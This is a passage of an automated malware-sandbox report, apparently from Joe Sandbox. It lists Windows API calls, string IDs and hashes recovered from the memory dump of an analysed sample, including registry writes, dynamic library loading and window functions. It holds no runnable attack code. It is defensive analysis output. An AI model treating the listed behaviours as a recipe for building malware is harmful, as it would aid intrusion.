                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00EE06B7
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00EE06C2
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00EE06CD
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00EE06D8
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00EE06E3
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00EE06EE
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00EE06F9
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00EE0704
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00EE070F
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00EE071A
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00EE0725
                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00EE0735
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EE0777
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                                                                                      • Opcode ID: 1fd4a54c6a703d446d4e409257da50ef5211a8db27a6b9041d8f53751e533b1e
                                                                                                                                                                                                                                      • Instruction ID: a2477d802bd92e32da86509e532cb480ab3b02571a921533b1595597687b01fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fd4a54c6a703d446d4e409257da50ef5211a8db27a6b9041d8f53751e533b1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD417470D083596EDB10DFBA8C8986EBFE8FF04354B50452AE11DE7281DA78E841CF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EECD16
                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFDCD0,00000000,?,00000000,?,?), ref: 00EECD9D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EECDFD
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EECF0B
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EED01A
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EED0A6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EED0DA
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EED0E7
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EED1B9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$Close$ConnectCreateRegistry
                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                      • API String ID: 492116352-966354055
                                                                                                                                                                                                                                      • Opcode ID: 143b14979684f019a0392c2051a0cefc0b0445e1f19a15b99751ea6ebafe766b
                                                                                                                                                                                                                                      • Instruction ID: 3b807ce30cd87b5749df7dc0d2a6364ac51684a970343465c0669cb9502f689e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 143b14979684f019a0392c2051a0cefc0b0445e1f19a15b99751ea6ebafe766b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6127F752082059FD714DF15D881B2AB7E5FF88358F14985DF89AAB3A2CB31ED42CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EC60CC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EC60DE
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EC60F5
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EC610A
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EC6110
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC6120
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EC6126
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EC6147
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EC6161
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC616A
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EC620D
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EC6213
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EC621A
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00EC6271
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EC627E
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00EC62A3
                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EC62CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                      • Opcode ID: 9d764e83cdc3cd59be013beefdbaea336dd428930cefb1a23658e6ad6be8fc14
                                                                                                                                                                                                                                      • Instruction ID: a71981fd253c0dac857943080e9c5a9550fb181e702bf1fda41c74fa7af9f855
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d764e83cdc3cd59be013beefdbaea336dd428930cefb1a23658e6ad6be8fc14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80716A31900609AFDB20DFA9CE45FAFBBF5EB48709F10491CE586B21A0D776E945CB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EF8C13
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EF6459), ref: 00EF8C6F
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EF8CA8
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EF8CEB
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EF8D22
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00EF8D2E
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EF8D3E
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00EF6459), ref: 00EF8D4D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EF8D6A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EF8D76
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                      • String ID: .dll$.exe$.icl$Yd
                                                                                                                                                                                                                                      • API String ID: 1446636887-2165359755
                                                                                                                                                                                                                                      • Opcode ID: a1db144a5f71eda2fbe05380d9d09703caaf34b25bc01258b192bb35b4393399
                                                                                                                                                                                                                                      • Instruction ID: b34d6c4c07c90e9d02cdd9673bf263ad302a2937ba69366ab2c22d5f06243587
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1db144a5f71eda2fbe05380d9d09703caaf34b25bc01258b192bb35b4393399
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D61DDB1540619BEEB14DF64DD45BBEBBACEF08714F109106FA19F60C1DB70AA84CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F3170C,00000FA0,F8D00C47,?,?,?,?,00EA2633,000000FF), ref: 00E8039C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00EA2633,000000FF), ref: 00E803A7
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00EA2633,000000FF), ref: 00E803B8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E803CE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E803DC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E803EA
                                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00EA2633,000000FF), ref: 00E80435
                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00F3170C,00000007,?,?,?,?,00EA2633,000000FF), ref: 00E80461
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EA2633,000000FF), ref: 00E80471
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00E803D4
                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 00E803C8
                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00E803E2
                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E803A2
                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00E803B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 3758863719-1714406822
                                                                                                                                                                                                                                      • Opcode ID: ad1e87cdc5a5523327e85002bfad8e5bed90ae9fd09330aefe59e4b341665dbe
                                                                                                                                                                                                                                      • Instruction ID: 485b2fb881bd99be61524dbb53b6cbe59cda3757d806d69ec4b5a88b2c95d6ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1e87cdc5a5523327e85002bfad8e5bed90ae9fd09330aefe59e4b341665dbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721D132A46705AFD7206BA59C49B7A3BE9FB44B61F041025FA0DF2290DF70DC09E761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00EFDCD0), ref: 00EE4914
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE4926
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00EFDCD0), ref: 00EE494B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00EFDCD0), ref: 00EE4997
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,00EFDCD0), ref: 00EE4A01
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00EE4ABB
                                                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE4B21
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00EE4B4B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                                                                                                      • Opcode ID: 9df208c652fd63b1a60f0e430142604b88daf95d957b9dfbd8c48ca1b24a3ed2
                                                                                                                                                                                                                                      • Instruction ID: 388e465b15605c8a1cfc5b5d94c93e09fa3e6ce197f921b62fb7300134c9d75f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9df208c652fd63b1a60f0e430142604b88daf95d957b9dfbd8c48ca1b24a3ed2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D125FB1A00149EFDB14DF55C884EAEBBB5FF85318F249098F509AB291D731ED46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EF122B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF12B9
                                                                                                                                                                                                                                        • Part of subcall function 00EC3274: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EC3286
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                      • API String ID: 3391685005-4258414348
                                                                                                                                                                                                                                      • Opcode ID: 1225e432b9bc24ce50b066d33d3c7827aa182cee55dd16931cef711014253d3f
                                                                                                                                                                                                                                      • Instruction ID: e6fdde447e52c82eeef4539b45e0b76ed308e4a5d5bdb0a22097c785271a3d27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1225e432b9bc24ce50b066d33d3c7827aa182cee55dd16931cef711014253d3f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE1CF31608309CFCB04DF25C45093AB7E2BF94358B04999DF996AB3A2DB30ED45CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F32990), ref: 00EA2F14
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F32990), ref: 00EA2FC4
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EA3008
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00EA3011
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(00F32990,00000000,?,00000000,00000000,00000000), ref: 00EA3024
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EA3030
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 8778ea47ec1b2afad232af23afcb8b13ac511666e0dec8cfef1996478abfa66b
                                                                                                                                                                                                                                      • Instruction ID: 620a8cc40e5a04c60faf20c44fd730bb8bd079b1a9e004598807b14a5d3f4355
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8778ea47ec1b2afad232af23afcb8b13ac511666e0dec8cfef1996478abfa66b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E371D731644209BFEB219F69DD89FAABF65FF09368F10520AF6147A1E0C7B1B850D750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00ED4748
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00ED4826
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED486E
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED48A9
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED48D7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType
                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                      • API String ID: 1600147383-4113822522
                                                                                                                                                                                                                                      • Opcode ID: 2647056658e8f98da253ae707d478f3eea253bfac61bae7560fd8ec8daec0e2a
                                                                                                                                                                                                                                      • Instruction ID: 0a66f1fbc16706939f4055673b91e4bf35a1e41b2400208e19fedd05457317a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2647056658e8f98da253ae707d478f3eea253bfac61bae7560fd8ec8daec0e2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B77103726083128FC300EF34D88186AB7E4EFA4398F00592EF896A3391E731DD46CB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00EF75EB
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EF765F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EF7681
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF7694
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EF76B5
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E60000,00000000), ref: 00EF76E4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF76FD
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EF7716
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EF771D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EF7735
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EF774D
                                                                                                                                                                                                                                        • Part of subcall function 00E79B44: GetWindowLongW.USER32(?,000000EB), ref: 00E79B52
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
